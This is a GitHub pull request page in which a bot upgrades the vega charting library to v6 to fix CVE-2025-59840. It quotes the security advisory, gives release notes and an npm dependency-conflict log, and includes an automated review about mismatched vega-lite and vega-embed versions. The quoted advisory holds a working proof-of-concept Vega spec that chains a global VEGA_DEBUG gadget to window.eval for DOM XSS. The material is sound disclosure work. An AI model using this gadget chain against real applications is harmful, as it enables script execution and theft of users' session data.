Skip to content

fix(deps): update dependency vega to v6 [security]#4643

Open
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-vega-vulnerability
Open

fix(deps): update dependency vega to v6 [security]#4643
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-vega-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate bot commented Nov 24, 2025
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
vega ^5.33.0^6.0.0 age confidence

GitHub Vulnerability Alerts

CVE-2025-59840

Impact

Applications meeting 2 conditions are at risk of arbitrary JavaScript code execution, even if "safe mode" expressionInterpreter is used.

  1. Use vega in an application that attaches vega library and a vega.View instance similar to the Vega Editor to the global window
  2. Allow user-defined Vega JSON definitions (vs JSON that was is only provided through source code)

Patches

  • If using latest Vega line (6.x)
    • vega 6.2.0 / vega-expression 6.1.0 / vega-interpreter 2.2.1 (if using AST evaluator mode)
  • If using Vega in a non-ESM environment
    • ( vega-expression 5.2.1 / 1.2.1 (if using AST evaluator mode)

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading

  • Do not attach vega View instances to global variables, as Vega editor used to do here
  • Do not attach vega to the global window as the editor used to do here

These practices of attaching the vega library and View instances may be convenient for debugging, but should not be used in production or in any situation where vega/vega-lite definitions could be provided by untrusted parties.

POC Summary

Vega offers the evaluation of expressions in a secure context. Arbitrary function call is prohibited. When an event is exposed to an expression, member get of window objects is possible. Because of this exposure, in some applications, a crafted object that overrides its toString method with a function that results in calling this.foo(this.bar), DOM XSS can be achieved.

In practice, an accessible gadget like this exists in the global VEGA_DEBUG code.

({
    toString: event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on, 
    eventName: event.view.console.log,
    _handlers: {
        undefined: 'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'
    },
    _handlerIndex: event.view.eval
})+1

POC Details

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": true,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "({toString:event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on, eventName:event.view.console.log,_handlers:{undefined:'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'},_handlerIndex:event.view.eval})+1"
        }

      ]
    }
  ]
}

This payload creates a scenario where whenever the mouse is moved, the toString function of the provided object is implicitly called when trying to resolve adding it with 1. The toString function has been overridden to a "gadget function" (VEGA_DEBUG.vega.CanvasHandler.prototype.on) that does the following:

   on(a, o) {
        const u = this.eventName(a)
          , d = this._handlers;
        if (this._handlerIndex(d[u], a, o) < 0) {
        ....
        }
        ....
   }
  1. Set u to the result of calling this.eventName with undefined
    • For our object, we have the eventName value set to console.log, which just logs undefined and returns undefined
  2. Sets d to this._handlers
    • For our object, we have this defined to be used later
  3. Calls this._handlerIndex with the result of u indexed into the d object as the first argument, and undefined as the second two.
    • For our object, _handlerIndex is set to window.eval, and when indexing undefined into the _handlers, a string to be evald containing the XSS payload is returned.

This results in XSS by using a globally scoped gadget to get full blown eval.

PoC Link

Navigate to vega editor, move the mouse, and observe that the arbitrary JavaScript from the configuration reaches the eval sink and DOM XSS is achieved.

Future investigation

In cases where VEGA_DEBUG is not enabled, there theoreticallycould be other gadgets on the global scope that allow for similar behavior. In cases where AST evaluator is used and there are blocks against getting references to eval, in theory there could be other gadgets on global scope (i.e. jQuery) that would allow for eval the same way (i.e. $.globalEval). As of this writing, no such globally scoped gadgets have been found.

Impact

This vulnerability allows for DOM XSS, potentially stored, potentially reflected, depending on how the library is being used. The vulnerability requires user interaction with the page to trigger.

An attacker can exploit this issue by tricking a user into opening a malicious Vega specification. Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the application’s domain. This can lead to theft of sensitive information such as authentication tokens, manipulation of data displayed to the user, or execution of unauthorized actions on behalf of the victim. This exploit compromises confidentiality and integrity of impacted applications.

Release Notes

vega/vega (vega)

v6.2.0

Compare Source

What's Changed

New Contributors

Full Changelog: vega/vega@v6.1.2...v6.2.0

v6.1.2

Compare Source

Full Changelog: vega/vega@v6.1.1...v6.1.2

v6.1.1

Compare Source

Full Changelog: vega/vega@v6.1.0...v6.1.1

v6.1.0

Compare Source

What's Changed

Full Changelog: vega/vega@v6.0.0...v6.1.0

v6.0.0

Compare Source

changes since v5.33.0

monorepo

vega-typings

docs

v5.33.1

Compare Source

What's Changed

Fixes GHSA-7f2v-3qq3-vvjf for v5 releases

Full Changelog: vega/vega@v5.33.0...v5.33.1

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
Copy link
Copy Markdown
Contributor Author

renovate bot commented Nov 24, 2025
edited
Loading

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: catalog/package-lock.json
npm warn ERESOLVE overriding peer dependency
npm warn While resolving: ajv-keywords@3.5.2
npm warn Found: ajv@8.18.0
npm warn node_modules/ajv
npm warn   ajv@"^8.16.0" from the root project
npm warn   9 more (ajv-formats, ajv-keywords, schema-utils, ajv-keywords, ...)
npm warn
npm warn Could not resolve dependency:
npm warn peer ajv@"^6.9.1" from ajv-keywords@3.5.2
npm warn node_modules/ajv-keywords
npm warn   ajv-keywords@"^3.5.2" from schema-utils@3.3.0
npm warn   node_modules/schema-utils
npm warn
npm warn Conflicting peer dependency: ajv@6.14.0
npm warn node_modules/ajv
npm warn   peer ajv@"^6.9.1" from ajv-keywords@3.5.2
npm warn   node_modules/ajv-keywords
npm warn     ajv-keywords@"^3.5.2" from schema-utils@3.3.0
npm warn     node_modules/schema-utils
npm error code ERESOLVE
npm error ERESOLVE could not resolve
npm error
npm error While resolving: vega-embed@6.22.2
npm error Found: vega@6.2.0
npm error node_modules/vega
npm error   vega@"^6.0.0" from the root project
npm error   peer vega@"*" from vega-themes@2.14.0
npm error   node_modules/vega-themes
npm error     vega-themes@"^2.14.0" from vega-embed@6.22.2
npm error     node_modules/vega-embed
npm error       vega-embed@"^6.22.2" from the root project
npm error
npm error Could not resolve dependency:
npm error peer vega@"^5.21.0" from vega-embed@6.22.2
npm error node_modules/vega-embed
npm error   vega-embed@"^6.22.2" from the root project
npm error
npm error Conflicting peer dependency: vega@5.33.1
npm error node_modules/vega
npm error   peer vega@"^5.21.0" from vega-embed@6.22.2
npm error   node_modules/vega-embed
npm error     vega-embed@"^6.22.2" from the root project
npm error
npm error Fix the upstream dependency conflict, or retry
npm error this command with --force or --legacy-peer-deps
npm error to accept an incorrect (and potentially broken) dependency resolution.
npm error
npm error
npm error For a full report see:
npm error /runner/cache/others/npm/_logs/2026-04-10T18_35_32_888Z-eresolve-report.txt
npm error A complete log of this run can be found in: /runner/cache/others/npm/_logs/2026-04-10T18_35_32_888Z-debug-0.log

@codecov
Copy link
Copy Markdown

codecov bot commented Nov 24, 2025
edited
Loading

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 94.05%. Comparing base (b6048c8) to head (d3ced82).

Additional details and impacted files 
@@             Coverage Diff             @@
##           master    #4643       +/-   ##
===========================================
+ Coverage   45.62%   94.05%   +48.42%     
===========================================
  Files         831      146      -685     
  Lines       33597    11766    -21831     
  Branches     5727        0     -5727     
===========================================
- Hits        15328    11066     -4262     
+ Misses      16264      700    -15564     
+ Partials     2005        0     -2005
Flag Coverage Δ
api-python 93.14% <ø> (ø)
catalog ?
lambda 96.63% <ø> (ø)
py-shared 98.18% <ø> (ø)

Flags with carried forward coverage won't be shown. Click here to find out more.

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

greptile-apps[bot]
greptile-apps bot reviewed Nov 24, 2025
View reviewed changes
Copy link
Copy Markdown
Contributor

@greptile-apps greptile-apps bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

1 file reviewed, no comments

Edit Code Review Agent Settings | Greptile

@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch from 5ab2eec to 4ac4b13 Compare November 26, 2025 05:57
@renovate renovate bot changed the title Update dependency vega to v6 [SECURITY] fix(deps): update dependency vega to v6 [security] Nov 26, 2025
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch 4 times, most recently from 9a7a88d to 2b7fe43 Compare December 3, 2025 05:35
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch 9 times, most recently from a1eea51 to 3a0f97f Compare December 9, 2025 16:25
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch 7 times, most recently from 6d0f34e to 7f3cd14 Compare December 17, 2025 14:57
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch 4 times, most recently from df05d8c to 5797da0 Compare December 19, 2025 12:26
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch 3 times, most recently from ff7546e to 339e75a Compare February 20, 2026 15:09
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch from 339e75a to 1db738a Compare February 24, 2026 19:33
@renovate renovate bot changed the title Update dependency vega to v6 [SECURITY] fix(deps): update dependency vega to v6 [security] Feb 24, 2026
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch 4 times, most recently from 09b552a to 9b94fe0 Compare March 3, 2026 18:14
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch 2 times, most recently from 362dd2c to 54a1b22 Compare March 6, 2026 12:54
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch 8 times, most recently from cbe5699 to 362fe00 Compare March 18, 2026 23:01
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch 3 times, most recently from 2c5d4ce to 81ec34b Compare March 25, 2026 13:41
@renovate renovate bot changed the title fix(deps): update dependency vega to v6 [security] fix(deps): update dependency vega to v6 [security] - autoclosed Mar 27, 2026
@renovate renovate bot closed this Mar 27, 2026
@renovate renovate bot deleted the renovate/npm-vega-vulnerability branch March 27, 2026 00:48
@renovate renovate bot changed the title fix(deps): update dependency vega to v6 [security] - autoclosed fix(deps): update dependency vega to v6 [security] Mar 30, 2026
@renovate renovate bot reopened this Mar 30, 2026
@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch from 647613f to 81ec34b Compare March 30, 2026 17:49
greptile-apps[bot]
greptile-apps bot reviewed Mar 30, 2026
View reviewed changes
catalog/package.json
Comment on lines +141 to 143
"vega": "^6.0.0",
"vega-embed": "^6.22.2",
"vega-lite": "^5.14.1",
Copy link
Copy Markdown
Contributor

@greptile-apps greptile-apps bot Mar 30, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Incomplete upgrade — mismatched vega ecosystem versions

vega has been bumped to ^6.0.0, but vega-embed (still at ^6.22.2) and vega-lite (still at ^5.14.1) are not compatible with vega 6. The correct version trio for vega 6 is:

Package Required for vega 6
vega ^6.0.0
vega-lite ^6.x ❌ (currently ^5.14.1)
vega-embed ^7.x ❌ (currently ^6.22.2)

The official vega-lite embedding docs confirm this combination (e.g., vega@6, vega-lite@6, vega-embed@7). Both vega-embed@6 and vega-lite@5 declare vega@^5 as a peer dependency, which conflicts with the newly installed vega@6. This likely produces npm peer-dependency warnings at install time and may result in two copies of vega being bundled, or runtime errors.

Additionally, vega 6.0.0 is ESM-only (no CJS/UMD bundles), which may require webpack configuration changes depending on how the project bundles the library.

The package-lock.json also still pins vega to 5.33.0, meaning npm ci will install the old version — the lock file must be regenerated after fixing the version matrix.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@greptile-apps greptile-apps[bot] greptile-apps[bot] left review comments

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

js dependencies

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants